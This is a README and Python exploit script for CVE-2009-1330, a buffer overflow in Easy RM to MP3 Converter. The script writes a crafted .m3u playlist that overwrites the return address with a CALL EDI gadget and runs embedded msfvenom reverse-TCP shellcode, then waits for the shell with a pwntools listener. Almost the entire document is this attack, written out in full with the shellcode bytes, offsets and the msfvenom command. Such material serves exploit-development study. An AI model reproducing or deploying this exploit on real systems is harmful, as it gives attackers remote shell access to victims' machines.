INFO
# CVE-2009-1330

Exploit for the buffer overflow in Easy RM to MP3 Converter 2.7.3.700 (CVE-2009-1330): an oversized entry in a crafted `.m3u` playlist overwrites the saved return address (EIP), which is redirected through a `CALL EDI` gadget into a `windows/shell_reverse_tcp` shellcode. Built with:

* pwntools
* msfvenom / `windows/shell_reverse_tcp` payload (callback address and port are fixed at generation time)
* ropper
* x64dbg
* Easy RM to MP3 Converter 2.7.3.700

Vulnerable app available at https://www.exploit-db.com/exploits/10374
EXP
#!/usr/bin/env python
#
# CVE-2009-1330 using:
# * pwntools
# * msfvenom / reverse_tcp payload
# * ropper
# * x64dbg
# * Easy RM to MP3 Converter 2.7.3.700
#
# Vulnerable app available at https://www.exploit-db.com/exploits/10374
import struct
from threading import Thread

from pwn import p32, listen
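def generate_payload():
    """Build the malicious ``.m3u`` contents for CVE-2009-1330.

    Layout of the returned buffer (offsets were established in the debugger,
    see the inline comments):

        [0, 9926)        ``A`` filler
        [9926, ...)      10-byte NOP sled followed by the msfvenom shellcode
        [..., 82179)     ``B`` filler up to the saved return address
        [82179, 82183)   address of a ``CALL EDI`` gadget in MSRMfilter03.dll

    When the overwritten return address is used, EDI points into the buffer
    at offset 9926, so ``CALL EDI`` lands on the NOP sled and runs the
    shellcode.

    Returns:
        bytes: the complete payload, 82183 bytes long. It is raw binary and
        must be written in binary mode (text mode would apply newline
        translation on Windows and UTF-8 encoding on Python 3, corrupting it).

    Raises:
        ValueError: if the shellcode does not fit between the two offsets, or
        if the assembled payload contains one of the bytes the shellcode was
        encoded to avoid (NUL, LF, CR) -- presumably because the playlist
        parser treats them as terminators; confirm before changing the list.
    """
    EIP_OFFSET = 82179         # EIP controlled at this offset
    SHELLCODE_OFFSET = 9926    # EDI points here when the gadget executes
    # Gadget from MSRMfilter03.dll. NOTE(review): assumes the DLL is mapped
    # at its preferred base (no ASLR / rebasing) -- confirm on the target.
    CALL_EDI_ADDR = 0x100304ec
    BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")

    # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LPORT=4444 -a x86
    #   LHOST=192.168.15.101 -f python --platform windows -b "\x00\x0a\x0d"
    # The callback address/port live inside this blob; regenerate it (with
    # the same -b list) to point the shell at a different listener.
    encoded = (
        b"\xbf\x70\xf9\x1b\x1c\xda\xd0\xd9\x74\x24\xf4\x5e"
        b"\x29\xc9\xb1\x52\x31\x7e\x12\x03\x7e\x12\x83\xb6"
        b"\xfd\xf9\xe9\xca\x16\x7f\x11\x32\xe7\xe0\x9b\xd7"
        b"\xd6\x20\xff\x9c\x49\x91\x8b\xf0\x65\x5a\xd9\xe0"
        b"\xfe\x2e\xf6\x07\xb6\x85\x20\x26\x47\xb5\x11\x29"
        b"\xcb\xc4\x45\x89\xf2\x06\x98\xc8\x33\x7a\x51\x98"
        b"\xec\xf0\xc4\x0c\x98\x4d\xd5\xa7\xd2\x40\x5d\x54"
        b"\xa2\x63\x4c\xcb\xb8\x3d\x4e\xea\x6d\x36\xc7\xf4"
        b"\x72\x73\x91\x8f\x41\x0f\x20\x59\x98\xf0\x8f\xa4"
        b"\x14\x03\xd1\xe1\x93\xfc\xa4\x1b\xe0\x81\xbe\xd8"
        b"\x9a\x5d\x4a\xfa\x3d\x15\xec\x26\xbf\xfa\x6b\xad"
        b"\xb3\xb7\xf8\xe9\xd7\x46\x2c\x82\xec\xc3\xd3\x44"
        b"\x65\x97\xf7\x40\x2d\x43\x99\xd1\x8b\x22\xa6\x01"
        b"\x74\x9a\x02\x4a\x99\xcf\x3e\x11\xf6\x3c\x73\xa9"
        b"\x06\x2b\x04\xda\x34\xf4\xbe\x74\x75\x7d\x19\x83"
        b"\x7a\x54\xdd\x1b\x85\x57\x1e\x32\x42\x03\x4e\x2c"
        b"\x63\x2c\x05\xac\x8c\xf9\x8a\xfc\x22\x52\x6b\xac"
        b"\x82\x02\x03\xa6\x0c\x7c\x33\xc9\xc6\x15\xde\x30"
        b"\x81\xd9\xb7\x35\x34\xb2\xc5\x49\xa7\x1e\x43\xaf"
        b"\xad\x8e\x05\x78\x5a\x36\x0c\xf2\xfb\xb7\x9a\x7f"
        b"\x3b\x33\x29\x80\xf2\xb4\x44\x92\x63\x35\x13\xc8"
        b"\x22\x4a\x89\x64\xa8\xd9\x56\x74\xa7\xc1\xc0\x23"
        b"\xe0\x34\x19\xa1\x1c\x6e\xb3\xd7\xdc\xf6\xfc\x53"
        b"\x3b\xcb\x03\x5a\xce\x77\x20\x4c\x16\x77\x6c\x38"
        b"\xc6\x2e\x3a\x96\xa0\x98\x8c\x40\x7b\x76\x47\x04"
        b"\xfa\xb4\x58\x52\x03\x91\x2e\xba\xb2\x4c\x77\xc5"
        b"\x7b\x19\x7f\xbe\x61\xb9\x80\x15\x22\xd9\x62\xbf"
        b"\x5f\x72\x3b\x2a\xe2\x1f\xbc\x81\x21\x26\x3f\x23"
        b"\xda\xdd\x5f\x46\xdf\x9a\xe7\xbb\xad\xb3\x8d\xbb"
        b"\x02\xb3\x87"
    )
    # Small NOP sled in front so a slightly imprecise EDI still slides in.
    shellcode = b"\x90" * 10 + encoded

    room = EIP_OFFSET - SHELLCODE_OFFSET
    if len(shellcode) > room:
        raise ValueError(
            "shellcode is {} bytes but only {} fit before the saved EIP".format(
                len(shellcode), room
            )
        )

    filler1 = b"A" * SHELLCODE_OFFSET
    filler2 = b"B" * (room - len(shellcode))
    # Little-endian 32-bit, same as pwntools' p32().
    ret_addr = struct.pack("<I", CALL_EDI_ADDR)
    payload = filler1 + shellcode + filler2 + ret_addr

    # Guard the whole buffer (including the gadget address) against the bytes
    # the encoder was told to avoid; any of them would truncate the entry.
    for bad in BAD_CHARS:
        if bad in payload:
            raise ValueError("payload contains bad char {!r}".format(bad))
    return payload


def attack(fname="input.m3u"):
    """Write the payload to *fname* and prompt the operator to open it.

    Args:
        fname: path of the playlist file to create; defaults to ``input.m3u``
            in the current directory, as before.

    The file is deliberately opened in binary mode: the payload is raw bytes
    and must reach the target application byte-for-byte.
    """
    payload = generate_payload()
    with open(fname, "wb") as f:
        f.write(payload)
    print("File {} has been created.".format(fname))
    print("Please use target software to open payload.")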
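if __name__ == "__main__":
    # set target info
    # NOTE: LHOST below does NOT change where the shell connects back to.
    # The callback address (192.168.15.101:4444) was baked into the shellcode
    # when msfvenom generated it (see generate_payload()); regenerate the blob
    # if the listener runs elsewhere. LPORT must match the msfvenom LPORT.
    LHOST = "127.0.0.1"
    LPORT = 4444
    # Writing the file is a short synchronous operation, so do it up front
    # rather than racing it on a worker thread against the blocking listener.
    attack()
    # pwntools listener on all interfaces; blocks until the target opens the
    # playlist and the reverse shell connects back.
    listener = listen(port=LPORT)
    listener.wait_for_connection()
    listener.interactive()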
